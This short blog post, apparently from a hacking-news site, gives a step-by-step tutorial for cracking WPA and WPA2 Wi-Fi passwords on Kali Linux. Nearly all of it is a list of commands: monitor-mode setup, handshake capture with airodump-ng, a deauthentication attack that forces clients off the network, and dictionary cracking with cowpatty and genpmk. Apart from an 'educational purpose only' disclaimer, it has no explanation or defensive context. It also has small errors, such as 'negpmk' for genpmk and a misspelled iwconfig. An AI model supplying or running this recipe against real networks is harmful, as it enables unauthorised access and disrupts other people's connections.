News

Published on September 19th, 2015 📆 | 4945 Views ⚑

0

Crack WPA & WPA2 with Cowpatty and Negpmk on Kali Linux


Text to Speech Demo
In this tutorial we are going to teach you How to crack WPA & WPA 2 with cowpatty and negpmk on Kali Linux. We high recommend this for research or educational purpose only.

Note: This tutorial is only for educational purpose. Use this tool at your own risks, we are not responsible for any damage that cause you.

[adsense size='1']

Things we used for cracking WPA & WPA2:

Command to crack WPA & WPA2:

airmon-ng 
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
airodump-ng wlan0 
airodump-ng -c [channel id] --write latesthackingnews --bssid [bssid of the wifi] wlan0
aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0
cowpatty -f darkc0de.lst -r latesthackingnews -s [ESSID of the wifi]
genpmk -f darkc0de.lst -d pregendump -s [ESSID of the wifi]
cowpatty -d pregendump -r latesthackingnews-01.cap -s [ESSID of the wifi]
sudo ifconfig wlan0 down
sudo iwcofnig wlan0 mode monitor
sudo ifconfig wlan0 up 





Here is a YouTube video on How to crack WPA and WPA2 with Aircrack-ng on Kali Linux:





Comments are closed.